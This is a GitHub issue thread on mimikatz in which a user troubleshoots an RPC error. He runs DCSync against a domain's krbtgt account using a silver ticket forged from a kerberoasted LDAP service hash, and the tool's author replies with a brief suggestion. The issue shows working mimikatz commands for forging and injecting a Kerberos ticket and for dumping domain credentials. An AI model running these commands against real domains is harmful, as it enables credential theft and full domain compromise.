### ISSUE TITLE
lsadump::dcsync issue

### ISSUE THREAD

**Issue by gordonta** [gentilkiwi/mimikatz#175]
I'm having errors with dcsync.  I injected a silver ticket of an LDAP SPN, stolen and cracked via kerberoasting, and am trying to dcsync with this ticket.  

`kerberos::golden /user:fake /domain:testdomain.local /sid:[SID] /target:testlds.testdomain.local /rc4:[HASH] /service:LDAP /ptt
lsadump::dcsync /dc:WinSvr-Domain01.testdomain.local /domain:testdomain.local /user:krbtgt`

It keeps returning 

`[DC] 'testdomain.local' will be the domain
[DC] 'WinSvr-Domain01.testdomain.local' will be the DC server
[DC] 'krbtgt' will be the user account
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)`

I've tried passing injecting legit domain credentials in a silver ticket and get the same result.

**Comment by gentilkiwi** [comment]
if you had already a silver ticket to LDAP, why need to stole/crack/kerberoast?
before all, if you have a valid one, you can check your LDAP connection with ldp.exe by eg.
